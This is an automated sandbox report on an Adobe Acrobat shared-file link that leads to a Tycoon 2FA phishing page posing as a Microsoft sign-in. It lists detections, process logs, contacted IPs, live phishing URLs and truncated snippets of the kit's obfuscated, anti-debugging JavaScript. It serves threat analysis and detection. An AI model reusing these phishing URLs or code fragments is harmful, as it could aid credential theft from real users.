Create Interactive Tour

Windows Analysis Report
https://acrobat.adobe.com/id/urn:aaid:sc:EU:ed356bc9-bf5a-442b-8177-cf362f34cfc8

Overview

General Information

Sample URL:https://acrobat.adobe.com/id/urn:aaid:sc:EU:ed356bc9-bf5a-442b-8177-cf362f34cfc8
Analysis ID:1649019
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score:100
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Yara detected AntiDebug via timestamp check
Yara detected HtmlPhish10
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
Phishing site or detected (based on various text indicators)
Creates files inside the system directory
Deletes files inside the Windows folder
Drops files with a non-matching file extension (content does not match file extension)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML page contains string obfuscation
HTML title does not match URL
Invalid T&C link found
Program does not show much activity (idle)
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 7008 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6240 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1996,i,11444617063479572013,5734293847583610241,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1564 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 6024 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://acrobat.adobe.com/id/urn:aaid:sc:EU:ed356bc9-bf5a-442b-8177-cf362f34cfc8" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_802JoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
    SourceRuleDescriptionAuthorStrings
    2.236.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
      2.221.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
        2.221.d.script.csvJoeSecurity_AntiDebugBrowserYara detected AntiDebug via timestamp checkJoe Security
          2.222.d.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
            2.222.d.script.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
              Click to see the 21 entries
              No Sigma rule has matched
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              Phishing

              barindex
              Source: https://4fsv.iatrivvbe.com/SAVMAEIXUVGWKJOGAmbcdidbjvshwcmlykdixjl01b1ects449v2i6glb?FBIHCRJAASLXEWVLWCQKQJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL '4fsv.iatrivvbe.com' does not match the legitimate domain for Microsoft., The URL contains suspicious elements such as a random subdomain '4fsv' and an unrelated domain 'iatrivvbe.com'., The presence of an input field asking for a password on a non-legitimate domain is a common phishing tactic. DOM: 3.21.pages.csv
              Source: https://4fsv.iatrivvbe.com/SAVMAEIXUVGWKJOGAmbcdidbjvshwcmlykdixjl01b1ects449v2i6glb?FBIHCRJAASLXEWVLWCQKQJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL '4fsv.iatrivvbe.com' does not match the legitimate domain for Microsoft., The URL contains unusual elements and does not resemble any known Microsoft subdomains., The domain 'iatrivvbe.com' is not associated with Microsoft and appears suspicious., The presence of input fields for 'Email, phone, or Skype' is typical for phishing attempts targeting Microsoft accounts. DOM: 3.19.pages.csv
              Source: Yara matchFile source: 3.19.pages.csv, type: HTML
              Source: Yara matchFile source: 3.21.pages.csv, type: HTML
              Source: Yara matchFile source: 3.23.pages.csv, type: HTML
              Source: Yara matchFile source: 2.222.d.script.csv, type: HTML
              Source: Yara matchFile source: 2.7.pages.csv, type: HTML
              Source: Yara matchFile source: 2.14.pages.csv, type: HTML
              Source: Yara matchFile source: 2.222.d.script.csv, type: HTML
              Source: Yara matchFile source: 2.237..script.csv, type: HTML
              Source: Yara matchFile source: 2.7.pages.csv, type: HTML
              Source: Yara matchFile source: 2.14.pages.csv, type: HTML
              Source: Yara matchFile source: 3.277..script.csv, type: HTML
              Source: Yara matchFile source: dropped/chromecache_802, type: DROPPED
              Source: Yara matchFile source: 3.274.d.script.csv, type: HTML
              Source: Yara matchFile source: 2.236.d.script.csv, type: HTML
              Source: Yara matchFile source: 2.221.d.script.csv, type: HTML
              Source: Yara matchFile source: 3.269..script.csv, type: HTML
              Source: Yara matchFile source: 2.267.d.script.csv, type: HTML
              Source: Yara matchFile source: 3.270..script.csv, type: HTML
              Source: Yara matchFile source: 3.19.pages.csv, type: HTML
              Source: Yara matchFile source: 3.21.pages.csv, type: HTML
              Source: Yara matchFile source: 3.23.pages.csv, type: HTML
              Source: Chrome DOM: 1.3OCR Text: Tools Edit Convert E-Sign Sign in Welcome to Acrobat x Sign in to do more With the file shared with you. oo Burns & oo Sign in Wi u cox you MAY LIKE Burns & Wilcox Limited Ask A1 Assistant YOU HAVE 2 NEW DOCUMENTS! Generate a summary Edit text & images *Pages :** 2 Compress a PDF * *Resolution . 250x500 DPI PDF to JPG From MPD49729- 23183 Export a PDF z Fill & Sign CLICK HERE TO VIEW YOUR DOCUMENT 1 Copyright 2025 (Burns & Wilcox Limited) All rights reserved. This e-mail and any attachments are for the exclusive and confidential use of the intended addressee only. It rnay contain privileged information which is not for the use of any third party. If you are not the intended recipient, you may not copy, forward, disclose or otherwise use it, or any part of it, in anyway. If this message has been received in error, please notify c the sender immediately by e-mail by return and delete the message from your system. Work on PDFs directly In-browser View, edit, sign, and comrrtent on PDFs directly in browser with the free Acrobat extension Add to Chrome
              Source: Chrome DOM: 0.2OCR Text: Burns Wi cox Burns & Wilcox Limited YOU HAVE 2 NEW DOCUMENTS! *pages 2 * *Resolution :** 250x500 DPI From MPD49729- 23183 CLICK HERE TO VIEW YOUR DOCUMENT Copyright 2025 (Burns & Wilcox Limited) All rights reserved. This e-rnail and any attachments are for the exclusive and confidential use of the intended addressee only. It may contain privileged Information which is not for the use of any third party: If you are not the Intended recipient, you may not copy, forward, disclose or otherwase use it, or any part of it, in anyway. If this message has been received in error, please notify the sender Immediately by e-mail by return and delete the message from your system.
              Source: https://4fsv.iatrivvbe.com/SAVMAEIXUVGWKJOGAmbcdidbjvshwcmlykdixjl01b1ects449v2i6glb?FBIHCRJAASLXEWVLWCQKQHTTP Parser: Number of links: 0
              Source: https://4fsv.iatrivvbe.com/SAVMAEIXUVGWKJOGAmbcdidbjvshwcmlykdixjl01b1ects449v2i6glb?FBIHCRJAASLXEWVLWCQKQHTTP Parser: <input type="password" .../> found but no <form action="...
              Source: https://4fsv.iatrivvbe.com/trs/HTTP Parser: Base64 decoded: if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) { window.location = "about:blank";}document.addEventListener("keydown", function (event) { function GDZKDFIBVx(event) { co...
              Source: https://acrobat.adobe.com/dc-conversions2-dropin/3.17.1_2.146.0/translations-en-US-json.jsHTTP Parser: Found new string: script "use strict";(self["webpackJsonp-conversions2"]=self["webpackJsonp-conversions2"]||[]).push([[818],{R5i5:e=>{e.exports=JSON.parse('{"pdfti.dropzone.heading.seo":"Convert a PDF to JPG image","pdftw.dropzone.heading.seo":"Convert PDF to Word","pdftxls.dropzone.description.seo":"Drag and drop a PDF file to use our PDF to Microsoft Excel converter.","pdftxls.dropzone.heading.seo":"Convert PDF to Excel","pdftw.dropzone.description.seo":"Drag and drop a PDF file to use our PDF to Microsoft Word converter.","pdftppt.dropzone.heading.seo":"Convert PDF to PPT","pdftppt.dropzone.description.seo":"Drag and drop a PDF file to use our PDF to Microsoft PowerPoint (PPT) converter.","pdftw.dropzone.description.mobile.seo":"Select a PDF file to use our PDF to Microsoft Word converter.","pdfti.dropzone.description.mobile.seo":"Select a PDF, then convert to JPG, PNG, or TIFF file formats.","pdftxls.dropzone.description.mobile.seo":"Select a PDF file to use our PDF to Microsoft Excel converter.","pdftppt.dropzone.description.mob...
              Source: https://4fsv.iatrivvbe.com/SAVMAEIXUVGWKJOGAmbcdidbjvshwcmlykdixjl01b1ects449v2i6glb?FBIHCRJAASLXEWVLWCQKQHTTP Parser: Title: Proceed To Secure Account does not match URL
              Source: https://4fsv.iatrivvbe.com/SAVMAEIXUVGWKJOGAmbcdidbjvshwcmlykdixjl01b1ects449v2i6glb?FBIHCRJAASLXEWVLWCQKQHTTP Parser: Invalid link: Terms of use
              Source: https://4fsv.iatrivvbe.com/SAVMAEIXUVGWKJOGAmbcdidbjvshwcmlykdixjl01b1ects449v2i6glb?FBIHCRJAASLXEWVLWCQKQHTTP Parser: Invalid link: Privacy & cookies
              Source: https://4fsv.iatrivvbe.com/SAVMAEIXUVGWKJOGAmbcdidbjvshwcmlykdixjl01b1ects449v2i6glb?FBIHCRJAASLXEWVLWCQKQHTTP Parser: Invalid link: Terms of use
              Source: https://4fsv.iatrivvbe.com/SAVMAEIXUVGWKJOGAmbcdidbjvshwcmlykdixjl01b1ects449v2i6glb?FBIHCRJAASLXEWVLWCQKQHTTP Parser: Invalid link: Privacy & cookies
              Source: https://4fsv.iatrivvbe.com/SAVMAEIXUVGWKJOGAmbcdidbjvshwcmlykdixjl01b1ects449v2i6glb?FBIHCRJAASLXEWVLWCQKQHTTP Parser: Invalid link: Terms of use
              Source: https://4fsv.iatrivvbe.com/SAVMAEIXUVGWKJOGAmbcdidbjvshwcmlykdixjl01b1ects449v2i6glb?FBIHCRJAASLXEWVLWCQKQHTTP Parser: Invalid link: Privacy & cookies
              Source: https://4fsv.iatrivvbe.com/SAVMAEIXUVGWKJOGAmbcdidbjvshwcmlykdixjl01b1ects449v2i6glb?FBIHCRJAASLXEWVLWCQKQHTTP Parser: var otherweburl = "";var websitenames = ["godaddy", "okta"];var bes = ["apple.com","netflix.com"];var pes = ["https:\/\/t.me\/","https:\/\/t.com\/","t.me\/","https:\/\/t.me.com\/","t.me.com\/","t.me@","https:\/\/t.me@","https:\/\/t.me","https:\/\/t.com","t.me","https:\/\/t.me.com","t.me.com","t.me\/@","https:\/\/t.me\/@","https:\/\/t.me@\/","t.me@\/","https:\/\/www.telegram.me\/","https:\/\/www.telegram.me"];var capnum = 1;var appnum = 1;var pvn = 0;var view = "";var pagelinkval = "di1x2p";var emailcheck = "0";var webname = "rtrim(/web8/, '/')";var urlo = "/tdeletwt34avsoqmfxlzxjb1wwfpto39svblhlwj4pnn1wgrhkgpzfijs32";var gdf = "/ijbxloxwecbo6roy7iblgglluzgquv7yrjtdrwm8ay0lw0saab115";var odf = "/ij9nzg8pqn1ulv7bhfyzipkfp6s4hab650";var twa = 0;var currentreq = null;var requestsent = false;var pagedata = "";var redirecturl = "";var useragent = navigator.useragent;var browsername;var userip;var usercountry;var errorcodeexecuted = false;if(useragent.match(/edg/i)){...
              Source: https://4fsv.iatrivvbe.com/trs/HTTP Parser: function weyjfdrmps(){knbsamazmv = atob("pcfet0nuwvbfigh0bww+cjxodg1sigxhbmc9imvuij4kpghlywq+ciagpg1ldgegy2hhcnnldd0ivvrgltgipgogidxtzxrhig5hbwu9inzpzxdwb3j0iibjb250zw50psj3awr0ad1kzxzpy2utd2lkdggsigluaxrpywwtc2nhbgu9ms4wij4kica8dgl0bgu+rwr1vmlzaw9uic0gvhjhbnnmb3jtaw5nievkdwnhdglvbjwvdgl0bgu+ciagphn0ewxlpgogicagym9kesb7ciagicagigzvbnqtzmftawx5oianu2vnb2ugvuknlcbuywhvbwesiedlbmv2yswgvmvyzgfuyswgc2fucy1zzxjpzjskicagicagbwfyz2luoiawowogicagicbwywrkaw5noiawowogicagicbiywnrz3jvdw5klwnvbg9yoiajzjlmowy5owogicagicbjb2xvcjogizmzmzskicagih0kicagighlywrlcib7ciagicagigjhy2tncm91bmq6igxpbmvhci1ncmfkawvudcgxmzvkzwcsicm2ytexy2isicmyntc1zmmpowogicagicbjb2xvcjogi2zmzjskicagicagcgfkzgluzzognjbwecaymhb4owogicagicb0zxh0lwfsawduoibjzw50zxi7ciagicb9ciagicbozwfkzxigadegewogicagicbtyxjnaw46ida7ciagicagigzvbnqtc2l6ztogm3jlbtskicagicagzm9udc13zwlnahq6igjvbgq7ciagicb9ciagicbozwfkzxigccb7ciagicagigzvbnqtc2l6ztogms4ycmvtowogicagicbtyxjnaw4tdg9woiaxmhb4owogicagfqogicagbmf2ihskicagicagymfja2dyb3vuzdogcmdiysgyntusidi1nswgmju1lcawljkpowogi...
              Source: https://4fsv.iatrivvbe.com/SAVMAEIXUVGWKJOGAmbcdidbjvshwcmlykdixjl01b1ects449v2i6glb?FBIHCRJAASLXEWVLWCQKQHTTP Parser: <input type="password" .../> found
              Source: https://acrobat.adobe.com/id/urn:aaid:sc:EU:ed356bc9-bf5a-442b-8177-cf362f34cfc8HTTP Parser: No favicon
              Source: https://acrobat.adobe.com/id/urn:aaid:sc:EU:ed356bc9-bf5a-442b-8177-cf362f34cfc8HTTP Parser: No favicon
              Source: https://acrobat.adobe.com/id/urn:aaid:sc:EU:ed356bc9-bf5a-442b-8177-cf362f34cfc8?viewer%21megaVerb=group-discoverHTTP Parser: No favicon
              Source: https://acrobat.adobe.com/id/urn:aaid:sc:EU:ed356bc9-bf5a-442b-8177-cf362f34cfc8?viewer%21megaVerb=group-discoverHTTP Parser: No favicon
              Source: https://4fsv.iatrivvbe.com/trs/HTTP Parser: No favicon
              Source: https://4fsv.iatrivvbe.com/SAVMAEIXUVGWKJOGAmbcdidbjvshwcmlykdixjl01b1ects449v2i6glb?FBIHCRJAASLXEWVLWCQKQHTTP Parser: No favicon
              Source: https://4fsv.iatrivvbe.com/SAVMAEIXUVGWKJOGAmbcdidbjvshwcmlykdixjl01b1ects449v2i6glb?FBIHCRJAASLXEWVLWCQKQHTTP Parser: No favicon
              Source: https://4fsv.iatrivvbe.com/SAVMAEIXUVGWKJOGAmbcdidbjvshwcmlykdixjl01b1ects449v2i6glb?FBIHCRJAASLXEWVLWCQKQHTTP Parser: No favicon
              Source: https://4fsv.iatrivvbe.com/SAVMAEIXUVGWKJOGAmbcdidbjvshwcmlykdixjl01b1ects449v2i6glb?FBIHCRJAASLXEWVLWCQKQHTTP Parser: No <meta name="author".. found
              Source: https://4fsv.iatrivvbe.com/SAVMAEIXUVGWKJOGAmbcdidbjvshwcmlykdixjl01b1ects449v2i6glb?FBIHCRJAASLXEWVLWCQKQHTTP Parser: No <meta name="author".. found
              Source: https://4fsv.iatrivvbe.com/SAVMAEIXUVGWKJOGAmbcdidbjvshwcmlykdixjl01b1ects449v2i6glb?FBIHCRJAASLXEWVLWCQKQHTTP Parser: No <meta name="author".. found
              Source: https://4fsv.iatrivvbe.com/SAVMAEIXUVGWKJOGAmbcdidbjvshwcmlykdixjl01b1ects449v2i6glb?FBIHCRJAASLXEWVLWCQKQHTTP Parser: No <meta name="copyright".. found
              Source: https://4fsv.iatrivvbe.com/SAVMAEIXUVGWKJOGAmbcdidbjvshwcmlykdixjl01b1ects449v2i6glb?FBIHCRJAASLXEWVLWCQKQHTTP Parser: No <meta name="copyright".. found
              Source: https://4fsv.iatrivvbe.com/SAVMAEIXUVGWKJOGAmbcdidbjvshwcmlykdixjl01b1ects449v2i6glb?FBIHCRJAASLXEWVLWCQKQHTTP Parser: No <meta name="copyright".. found
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
              Source: chrome.exeMemory has grown: Private usage: 19MB later: 38MB
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir7008_768522777
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir7008_768522777
              Source: classification engineClassification label: mal100.phis.evad.win@24/343@0/390
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1996,i,11444617063479572013,5734293847583610241,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1564 /prefetch:3
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://acrobat.adobe.com/id/urn:aaid:sc:EU:ed356bc9-bf5a-442b-8177-cf362f34cfc8"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1996,i,11444617063479572013,5734293847583610241,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1564 /prefetch:3
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 505Jump to dropped file

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: 2.221.d.script.csv, type: HTML
              Source: Yara matchFile source: 3.269..script.csv, type: HTML
              Source: Yara matchFile source: 3.270..script.csv, type: HTML
              Source: Yara matchFile source: 3.19.pages.csv, type: HTML
              Source: Yara matchFile source: 3.21.pages.csv, type: HTML
              Source: Yara matchFile source: 3.23.pages.csv, type: HTML
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting
              Valid AccountsWindows Management Instrumentation1
              Scripting
              1
              Process Injection
              22
              Masquerading
              OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              Extra Window Memory Injection
              1
              Process Injection
              LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information
              Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              File Deletion
              NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Extra Window Memory Injection
              LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              https://acrobat.adobe.com/id/urn:aaid:sc:EU:ed356bc9-bf5a-442b-8177-cf362f34cfc80%Avira URL Cloudsafe
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No contacted domains info
              NameMaliciousAntivirus DetectionReputation
              https://4fsv.iatrivvbe.com/SAVMAEIXUVGWKJOGAmbcdidbjvshwcmlykdixjl01b1ects449v2i6glb?FBIHCRJAASLXEWVLWCQKQtrue
                unknown
                https://4fsv.iatrivvbe.com/trs/false
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  18.173.219.107
                  unknownUnited States
                  3MIT-GATEWAYSUSfalse
                  151.101.1.138
                  unknownUnited States
                  54113FASTLYUSfalse
                  23.50.53.239
                  unknownUnited States
                  20940AKAMAI-ASN1EUfalse
                  172.253.63.84
                  unknownUnited States
                  15169GOOGLEUSfalse
                  104.21.12.211
                  unknownUnited States
                  13335CLOUDFLARENETUSfalse
                  13.249.91.89
                  unknownUnited States
                  16509AMAZON-02USfalse
                  172.64.155.61
                  unknownUnited States
                  13335CLOUDFLARENETUSfalse
                  151.101.130.137
                  unknownUnited States
                  54113FASTLYUSfalse
                  172.67.196.11
                  unknownUnited States
                  13335CLOUDFLARENETUSfalse
                  142.250.65.238
                  unknownUnited States
                  15169GOOGLEUSfalse
                  23.204.152.162
                  unknownUnited States
                  20940AKAMAI-ASN1EUfalse
                  18.164.124.11
                  unknownUnited States
                  3MIT-GATEWAYSUSfalse
                  35.190.80.1
                  unknownUnited States
                  15169GOOGLEUSfalse
                  63.140.38.217
                  unknownUnited States
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  104.16.2.189
                  unknownUnited States
                  13335CLOUDFLARENETUSfalse
                  99.83.173.21
                  unknownUnited States
                  16509AMAZON-02USfalse
                  23.55.235.178
                  unknownUnited States
                  20940AKAMAI-ASN1EUfalse
                  13.35.93.64
                  unknownUnited States
                  16509AMAZON-02USfalse
                  1.1.1.1
                  unknownAustralia
                  13335CLOUDFLARENETUSfalse
                  23.33.42.132
                  unknownUnited States
                  20940AKAMAI-ASN1EUfalse
                  172.217.165.138
                  unknownUnited States
                  15169GOOGLEUSfalse
                  75.2.10.96
                  unknownUnited States
                  16509AMAZON-02USfalse
                  104.21.55.185
                  unknownUnited States
                  13335CLOUDFLARENETUSfalse
                  151.101.193.138
                  unknownUnited States
                  54113FASTLYUSfalse
                  104.18.95.41
                  unknownUnited States
                  13335CLOUDFLARENETUSfalse
                  142.250.65.206
                  unknownUnited States
                  15169GOOGLEUSfalse
                  172.66.0.163
                  unknownUnited States
                  13335CLOUDFLARENETUSfalse
                  63.140.39.224
                  unknownUnited States
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  142.250.72.99
                  unknownUnited States
                  15169GOOGLEUSfalse
                  67.202.29.163
                  unknownUnited States
                  14618AMAZON-AESUSfalse
                  52.73.181.51
                  unknownUnited States
                  14618AMAZON-AESUSfalse
                  142.251.41.3
                  unknownUnited States
                  15169GOOGLEUSfalse
                  142.251.41.4
                  unknownUnited States
                  15169GOOGLEUSfalse
                  34.231.53.248
                  unknownUnited States
                  14618AMAZON-AESUSfalse
                  104.26.0.100
                  unknownUnited States
                  13335CLOUDFLARENETUSfalse
                  3.236.206.93
                  unknownUnited States
                  14618AMAZON-AESUSfalse
                  104.18.20.58
                  unknownUnited States
                  13335CLOUDFLARENETUSfalse
                  140.82.114.3
                  unknownUnited States
                  36459GITHUBUSfalse
                  13.35.93.13
                  unknownUnited States
                  16509AMAZON-02USfalse
                  104.18.94.41
                  unknownUnited States
                  13335CLOUDFLARENETUSfalse
                  23.48.224.109
                  unknownUnited States
                  20940AKAMAI-ASN1EUfalse
                  104.21.92.165
                  unknownUnited States
                  13335CLOUDFLARENETUSfalse
                  23.51.56.185
                  unknownUnited States
                  4788TMNET-AS-APTMNetInternetServiceProviderMYfalse
                  52.22.41.97
                  unknownUnited States
                  14618AMAZON-AESUSfalse
                  23.204.152.141
                  unknownUnited States
                  20940AKAMAI-ASN1EUfalse
                  44.198.154.229
                  unknownUnited States
                  14618AMAZON-AESUSfalse
                  34.237.241.83
                  unknownUnited States
                  14618AMAZON-AESUSfalse
                  52.6.155.20
                  unknownUnited States
                  14618AMAZON-AESUSfalse
                  3.230.130.186
                  unknownUnited States
                  14618AMAZON-AESUSfalse
                  104.16.6.189
                  unknownUnited States
                  13335CLOUDFLARENETUSfalse
                  108.138.128.115
                  unknownUnited States
                  16509AMAZON-02USfalse
                  3.219.243.226
                  unknownUnited States
                  14618AMAZON-AESUSfalse
                  104.17.24.14
                  unknownUnited States
                  13335CLOUDFLARENETUSfalse
                  18.164.124.91
                  unknownUnited States
                  3MIT-GATEWAYSUSfalse
                  23.51.57.57
                  unknownUnited States
                  4788TMNET-AS-APTMNetInternetServiceProviderMYfalse
                  63.140.38.138
                  unknownUnited States
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  44.205.222.62
                  unknownUnited States
                  14618AMAZON-AESUSfalse
                  18.210.40.188
                  unknownUnited States
                  14618AMAZON-AESUSfalse
                  13.225.63.103
                  unknownUnited States
                  16509AMAZON-02USfalse
                  142.250.65.195
                  unknownUnited States
                  15169GOOGLEUSfalse
                  142.251.40.238
                  unknownUnited States
                  15169GOOGLEUSfalse
                  34.199.101.34
                  unknownUnited States
                  14618AMAZON-AESUSfalse
                  142.250.64.106
                  unknownUnited States
                  15169GOOGLEUSfalse
                  35.170.167.46
                  unknownUnited States
                  14618AMAZON-AESUSfalse
                  23.204.152.134
                  unknownUnited States
                  20940AKAMAI-ASN1EUfalse
                  18.173.219.72
                  unknownUnited States
                  3MIT-GATEWAYSUSfalse
                  23.48.224.102
                  unknownUnited States
                  20940AKAMAI-ASN1EUfalse
                  13.249.91.72
                  unknownUnited States
                  16509AMAZON-02USfalse
                  172.67.70.233
                  unknownUnited States
                  13335CLOUDFLARENETUSfalse
                  23.48.224.105
                  unknownUnited States
                  20940AKAMAI-ASN1EUfalse
                  185.199.108.133
                  unknownNetherlands
                  54113FASTLYUSfalse
                  34.120.195.249
                  unknownUnited States
                  15169GOOGLEUSfalse
                  44.214.7.0
                  unknownUnited States
                  14618AMAZON-AESUSfalse
                  IP
                  127.0.0.1
                  192.168.2.16
                  192.168.2.24
                  Joe Sandbox version:42.0.0 Malachite
                  Analysis ID:1649019
                  Start date and time:2025-03-26 12:28:17 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                  Sample URL:https://acrobat.adobe.com/id/urn:aaid:sc:EU:ed356bc9-bf5a-442b-8177-cf362f34cfc8
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:14
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • EGA enabled
                  Analysis Mode:stream
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.phis.evad.win@24/343@0/390
                  • Exclude process from analysis (whitelisted): svchost.exe
                  • Excluded IPs from analysis (whitelisted): 142.251.41.3, 142.250.65.206, 142.250.65.238, 172.253.63.84, 142.251.41.14, 23.33.42.132
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.
                  • VT rate limit hit for: https://acrobat.adobe.com/id/urn:aaid:sc:EU:ed356bc9-bf5a-442b-8177-cf362f34cfc8
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
